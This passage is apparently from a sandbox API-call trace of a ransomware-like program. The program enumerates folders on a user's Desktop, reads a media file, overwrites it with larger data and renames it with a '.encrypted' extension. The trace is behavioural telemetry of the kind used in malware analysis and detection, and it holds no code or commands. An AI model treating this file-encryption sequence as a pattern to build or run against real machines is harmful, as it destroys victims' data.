lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\", lpFilePart=0x0) returned 0x43 [0154.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10530440, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x520ea050, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0x520ea050, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee7b0 [0154.181] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10530440, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x520ea050, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0x520ea050, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.181] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0661b40, ftCreationTime.dwHighDateTime=0x1d5d98d, ftLastAccessTime.dwLowDateTime=0x79fa65d0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x79fa65d0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x3f41, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Ju8SHDCZG8iLL0GN0.pps", cAlternateFileName="5JU8SH~1.PPS")) returned 1 [0154.181] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7a26af0, ftCreationTime.dwHighDateTime=0x1d5de87, ftLastAccessTime.dwLowDateTime=0xcda0e420, ftLastAccessTime.dwHighDateTime=0x1d5da2b, ftLastWriteTime.dwLowDateTime=0xcda0e420, ftLastWriteTime.dwHighDateTime=0x1d5da2b, nFileSizeHigh=0x0, nFileSizeLow=0x12b36, dwReserved0=0x0, dwReserved1=0x0, cFileName="KnCPV5H__f.avi", cAlternateFileName="KNCPV5~1.AVI")) returned 1 [0154.182] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ba3a640, ftCreationTime.dwHighDateTime=0x1d5de24, ftLastAccessTime.dwLowDateTime=0xbecd05b0, ftLastAccessTime.dwHighDateTime=0x1d5e123, ftLastWriteTime.dwLowDateTime=0xbecd05b0, ftLastWriteTime.dwHighDateTime=0x1d5e123, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NaofNftU-JyfYoBo", cAlternateFileName="NAOFNF~1")) returned 1 [0154.182] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81286a50, ftCreationTime.dwHighDateTime=0x1d5dea4, ftLastAccessTime.dwLowDateTime=0x640a70d0, ftLastAccessTime.dwHighDateTime=0x1d5def4, ftLastWriteTime.dwLowDateTime=0x640a70d0, ftLastWriteTime.dwHighDateTime=0x1d5def4, nFileSizeHigh=0x0, nFileSizeLow=0x15f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="py5PCQSDoMrsI.gif", cAlternateFileName="PY5PCQ~1.GIF")) returned 1 [0154.182] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.182] FindClose (in: hFindFile=0x94ee7b0 | out: hFindFile=0x94ee7b0) returned 1 [0154.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0154.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0154.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0154.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1", lpFilePart=0x0) returned 0x42 [0154.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\", lpFilePart=0x0) returned 0x43 [0154.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10530440, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x520ea050, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0x520ea050, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee7b0 [0154.184] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10530440, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x520ea050, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0x520ea050, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.184] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0661b40, ftCreationTime.dwHighDateTime=0x1d5d98d, ftLastAccessTime.dwLowDateTime=0x79fa65d0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x79fa65d0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x3f41, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Ju8SHDCZG8iLL0GN0.pps", cAlternateFileName="5JU8SH~1.PPS")) returned 1 [0154.184] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7a26af0, ftCreationTime.dwHighDateTime=0x1d5de87, ftLastAccessTime.dwLowDateTime=0xcda0e420, ftLastAccessTime.dwHighDateTime=0x1d5da2b, ftLastWriteTime.dwLowDateTime=0xcda0e420, ftLastWriteTime.dwHighDateTime=0x1d5da2b, nFileSizeHigh=0x0, nFileSizeLow=0x12b36, dwReserved0=0x0, dwReserved1=0x0, cFileName="KnCPV5H__f.avi", cAlternateFileName="KNCPV5~1.AVI")) returned 1 [0154.184] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ba3a640, ftCreationTime.dwHighDateTime=0x1d5de24, ftLastAccessTime.dwLowDateTime=0xbecd05b0, ftLastAccessTime.dwHighDateTime=0x1d5e123, ftLastWriteTime.dwLowDateTime=0xbecd05b0, ftLastWriteTime.dwHighDateTime=0x1d5e123, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NaofNftU-JyfYoBo", cAlternateFileName="NAOFNF~1")) returned 1 [0154.184] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81286a50, ftCreationTime.dwHighDateTime=0x1d5dea4, ftLastAccessTime.dwLowDateTime=0x640a70d0, ftLastAccessTime.dwHighDateTime=0x1d5def4, ftLastWriteTime.dwLowDateTime=0x640a70d0, ftLastWriteTime.dwHighDateTime=0x1d5def4, nFileSizeHigh=0x0, nFileSizeLow=0x15f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="py5PCQSDoMrsI.gif", cAlternateFileName="PY5PCQ~1.GIF")) returned 1 [0154.185] FindNextFileW (in: hFindFile=0x94ee7b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81286a50, ftCreationTime.dwHighDateTime=0x1d5dea4, ftLastAccessTime.dwLowDateTime=0x640a70d0, ftLastAccessTime.dwHighDateTime=0x1d5def4, ftLastWriteTime.dwLowDateTime=0x640a70d0, ftLastWriteTime.dwHighDateTime=0x1d5def4, nFileSizeHigh=0x0, nFileSizeLow=0x15f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="py5PCQSDoMrsI.gif", cAlternateFileName="PY5PCQ~1.GIF")) returned 0 [0154.185] FindClose (in: hFindFile=0x94ee7b0 | out: hFindFile=0x94ee7b0) returned 1 [0154.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0154.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0154.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi", lpFilePart=0x0) returned 0x51 [0154.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0154.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\kncpv5h__f.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.186] GetFileType (hFile=0x4d0) returned 0x1 [0154.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0154.186] GetFileType (hFile=0x4d0) returned 0x1 [0154.187] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x12b36 [0154.187] ReadFile (in: hFile=0x4d0, lpBuffer=0x22e9c40, nNumberOfBytesToRead=0x12b36, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22e9c40*, lpNumberOfBytesRead=0x2ee7d4*=0x12b36, lpOverlapped=0x0) returned 1 [0154.188] CloseHandle (hObject=0x4d0) returned 1 [0154.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0154.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0154.214] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0154.214] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi", lpFilePart=0x0) returned 0x51 [0154.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0154.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\kncpv5h__f.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.215] GetFileType (hFile=0x4d0) returned 0x1 [0154.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0154.215] GetFileType (hFile=0x4d0) returned 0x1 [0154.215] WriteFile (in: hFile=0x4d0, lpBuffer=0x236ebc4*, nNumberOfBytesToWrite=0x12b40, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x236ebc4*, lpNumberOfBytesWritten=0x2ee7c4*=0x12b40, lpOverlapped=0x0) returned 1 [0154.217] CloseHandle (hObject=0x4d0) returned 1 [0154.218] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi", lpFilePart=0x0) returned 0x51 [0154.218] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi.encrypted", lpFilePart=0x0) returned 0x5b [0154.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0154.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\kncpv5h__f.avi"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7a26af0, ftCreationTime.dwHighDateTime=0x1d5de87, ftLastAccessTime.dwLowDateTime=0xcda0e420, ftLastAccessTime.dwHighDateTime=0x1d5da2b, ftLastWriteTime.dwLowDateTime=0x42e37c80, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x12b40)) returned 1 [0154.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0154.219] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\kncpv5h__f.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\KnCPV5H__f.avi.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\kncpv5h__f.avi.encrypted")) returned 1 [0154.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0154.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo", lpFilePart=0x0) returned 0x53 [0154.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\", lpFilePart=0x0) returned 0x54 [0154.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ba3a640, ftCreationTime.dwHighDateTime=0x1d5de24, ftLastAccessTime.dwLowDateTime=0xbecd05b0, ftLastAccessTime.dwHighDateTime=0x1d5e123, ftLastWriteTime.dwLowDateTime=0xbecd05b0, ftLastWriteTime.dwHighDateTime=0x1d5e123, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee830 [0154.323] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ba3a640, ftCreationTime.dwHighDateTime=0x1d5de24, ftLastAccessTime.dwLowDateTime=0xbecd05b0, ftLastAccessTime.dwHighDateTime=0x1d5e123, ftLastWriteTime.dwLowDateTime=0xbecd05b0, ftLastWriteTime.dwHighDateTime=0x1d5e123, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.323] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ab4da0, ftCreationTime.dwHighDateTime=0x1d5d98d, ftLastAccessTime.dwLowDateTime=0xcca2ea00, ftLastAccessTime.dwHighDateTime=0x1d5e3cc, ftLastWriteTime.dwLowDateTime=0xcca2ea00, ftLastWriteTime.dwHighDateTime=0x1d5e3cc, nFileSizeHigh=0x0, nFileSizeLow=0x19b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="hSwS2S8.wav", cAlternateFileName="")) returned 1 [0154.323] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d736230, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0xbcf2fd10, ftLastAccessTime.dwHighDateTime=0x1d5e5da, ftLastWriteTime.dwLowDateTime=0xbcf2fd10, ftLastWriteTime.dwHighDateTime=0x1d5e5da, nFileSizeHigh=0x0, nFileSizeLow=0x143df, dwReserved0=0x0, dwReserved1=0x0, cFileName="SKf7JlO-bEVsJz.flv", cAlternateFileName="SKF7JL~1.FLV")) returned 1 [0154.324] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd364ae10, ftCreationTime.dwHighDateTime=0x1d5df0c, ftLastAccessTime.dwLowDateTime=0xfc6cb00, ftLastAccessTime.dwHighDateTime=0x1d5e6f5, ftLastWriteTime.dwLowDateTime=0xfc6cb00, ftLastWriteTime.dwHighDateTime=0x1d5e6f5, nFileSizeHigh=0x0, nFileSizeLow=0x94ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zl4D3YnRS.jpg", cAlternateFileName="ZL4D3Y~1.JPG")) returned 1 [0154.324] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.324] FindClose (in: hFindFile=0x94ee830 | out: hFindFile=0x94ee830) returned 1 [0154.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0154.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0154.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0154.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo", lpFilePart=0x0) returned 0x53 [0154.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\", lpFilePart=0x0) returned 0x54 [0154.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ba3a640, ftCreationTime.dwHighDateTime=0x1d5de24, ftLastAccessTime.dwLowDateTime=0xbecd05b0, ftLastAccessTime.dwHighDateTime=0x1d5e123, ftLastWriteTime.dwLowDateTime=0xbecd05b0, ftLastWriteTime.dwHighDateTime=0x1d5e123, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee830 [0154.326] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ba3a640, ftCreationTime.dwHighDateTime=0x1d5de24, ftLastAccessTime.dwLowDateTime=0xbecd05b0, ftLastAccessTime.dwHighDateTime=0x1d5e123, ftLastWriteTime.dwLowDateTime=0xbecd05b0, ftLastWriteTime.dwHighDateTime=0x1d5e123, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.326] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ab4da0, ftCreationTime.dwHighDateTime=0x1d5d98d, ftLastAccessTime.dwLowDateTime=0xcca2ea00, ftLastAccessTime.dwHighDateTime=0x1d5e3cc, ftLastWriteTime.dwLowDateTime=0xcca2ea00, ftLastWriteTime.dwHighDateTime=0x1d5e3cc, nFileSizeHigh=0x0, nFileSizeLow=0x19b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="hSwS2S8.wav", cAlternateFileName="")) returned 1 [0154.326] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d736230, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0xbcf2fd10, ftLastAccessTime.dwHighDateTime=0x1d5e5da, ftLastWriteTime.dwLowDateTime=0xbcf2fd10, ftLastWriteTime.dwHighDateTime=0x1d5e5da, nFileSizeHigh=0x0, nFileSizeLow=0x143df, dwReserved0=0x0, dwReserved1=0x0, cFileName="SKf7JlO-bEVsJz.flv", cAlternateFileName="SKF7JL~1.FLV")) returned 1 [0154.326] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd364ae10, ftCreationTime.dwHighDateTime=0x1d5df0c, ftLastAccessTime.dwLowDateTime=0xfc6cb00, ftLastAccessTime.dwHighDateTime=0x1d5e6f5, ftLastWriteTime.dwLowDateTime=0xfc6cb00, ftLastWriteTime.dwHighDateTime=0x1d5e6f5, nFileSizeHigh=0x0, nFileSizeLow=0x94ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zl4D3YnRS.jpg", cAlternateFileName="ZL4D3Y~1.JPG")) returned 1 [0154.326] FindNextFileW (in: hFindFile=0x94ee830, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd364ae10, ftCreationTime.dwHighDateTime=0x1d5df0c, ftLastAccessTime.dwLowDateTime=0xfc6cb00, ftLastAccessTime.dwHighDateTime=0x1d5e6f5, ftLastWriteTime.dwLowDateTime=0xfc6cb00, ftLastWriteTime.dwHighDateTime=0x1d5e6f5, nFileSizeHigh=0x0, nFileSizeLow=0x94ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zl4D3YnRS.jpg", cAlternateFileName="ZL4D3Y~1.JPG")) returned 0 [0154.326] FindClose (in: hFindFile=0x94ee830 | out: hFindFile=0x94ee830) returned 1 [0154.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0154.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0154.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 